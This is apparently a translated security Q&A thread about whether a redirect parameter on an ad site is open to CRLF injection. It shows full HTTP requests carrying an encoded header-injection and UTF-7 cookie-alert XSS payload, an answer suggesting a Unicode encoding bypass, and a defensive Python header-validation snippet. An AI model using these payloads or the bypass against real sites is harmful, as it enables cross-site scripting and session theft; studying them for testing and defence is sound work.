How to exploit CRLF injection?

Security user
Asked 2015-05-10 09:12:31
1 answer · 7.9K views · 0 followers · 2 votes

While running a few tests against a website, I found the following:

Request:

GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=format%3Dhtml HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0

When forwarded, the response was:

HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328

<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard>redirected</a>.</body></html>

After a few hours of modifying different parameters, I think I found a CRLF injection in the "intended_params=format%3Dhtml" parameter, which changes the Location header and the redirect URL:

Request:

GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=%0d%0aContentType%3a%20text%2fhtml%3bcharset%3dUTF-7%0d%0aContent-Length%3a%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies%3a%27%2Bdocument%2ecookie%29%2BADw-%2fscript%2BAD4-%2BADw-%2fbody%2BAD4-%2BADw-%2fhtml%2BAD4 HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0

Response:

HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328

<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4">redirected</a>.</body></html>

Is this behaviour exploitable in some way? Could you use it to set cookies or cause HTTP response splitting?

Thanks in advance.


1 Answer

Security user

Posted 2015-05-11 00:15:45

As @Gumbo said, the CRLF is correctly encoded as %0d%0a in the resulting URL, as you can see. If headers were being set when the parameter was passed through, you would see them as separate headers. You could try different encodings, e.g. %E5%98%8A%E5%98%8D :)

The ability of an attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.

If you were able to split the response, you could carry out the other attacks defined here. That explains what attacks can be performed if s/he is able to manipulate the HTTP headers.

Headers are separated by a single CRLF, and the headers of the response are separated from the body by two, which allows you to insert your own forged content.

However, since the response is a 302, it is hard to exploit. Although, you may find the following interesting; have a look.

http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html

Despite the 302 redirect, the author still managed to trigger XSS in IE.

Votes: 3
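As an added example (not part of the question or the answer above), here is a small Python check a defender can run over a captured response to confirm what the answer describes: a client splits the head from the body at CRLF CRLF, a properly encoded Location keeps the injected %0D%0A inside one header value, and a header-value guard should reject raw CR/LF as well as code points above U+00FF, since %E5%98%8A%E5%98%8D decodes to U+560A/U+560D whose low bytes are LF and CR. The sample response is constructed from the Location header in the question; `split_response`, `is_safe_header_value`, `safe_location` and `location_is_single_header` are names chosen here.

```python
from urllib.parse import quote

CRLF = b"\r\n"

# Constructed sample: a 302 built from the Location header shown in the question.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"content-type: text/html; charset=utf-8\r\n"
    b"location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard"
    b"?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-\r\n"
    b"content-length: 0\r\n"
    b"\r\n"
)


def split_response(raw: bytes):
    """Split a raw HTTP/1.1 response the way a client does: one CRLF between
    headers, CRLF CRLF between the head and the body. A CR/LF that reached a
    header value unencoded would surface here as an extra header or an early
    body; a percent-encoded one stays inside its header's value."""
    head, _, body = raw.partition(CRLF + CRLF)
    status_line, *header_lines = head.split(CRLF)
    headers = []
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower().decode("latin-1"),
                        value.strip().decode("latin-1")))
    return status_line.decode("latin-1"), headers, body


def is_safe_header_value(value: str) -> bool:
    """Guard for values a server is about to emit in a header.
    Rejects raw CR, LF and NUL, and any code point above U+00FF: some HTTP
    stacks have truncated such characters to their low byte (U+560A -> 0x0A,
    U+560D -> 0x0D), which is what the %E5%98%8A%E5%98%8D sequence encodes."""
    return not any(ch in "\r\n\0" or ord(ch) > 0xFF for ch in value)


def safe_location(url: str) -> str:
    """Build a Location value the way the server in the question did: keep
    URL syntax characters, percent-encode everything else (CR -> %0D, LF -> %0A)
    so the value can never terminate the header it sits in."""
    return quote(url, safe=":/?#[]@!$&'()*+,;=%-._~")


def location_is_single_header(raw: bytes) -> bool:
    """True when the response carries exactly one Location header and its
    value contains no raw line break (the 'not actually split' case above)."""
    _, headers, _ = split_response(raw)
    locations = [v for n, v in headers if n == "location"]
    return len(locations) == 1 and is_safe_header_value(locations[0])
```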
Original page content provided by Security. Translation supported by Tencent Cloud Xiaowei's IT-domain engine.
Original link:

https://security.stackexchange.com/questions/88910
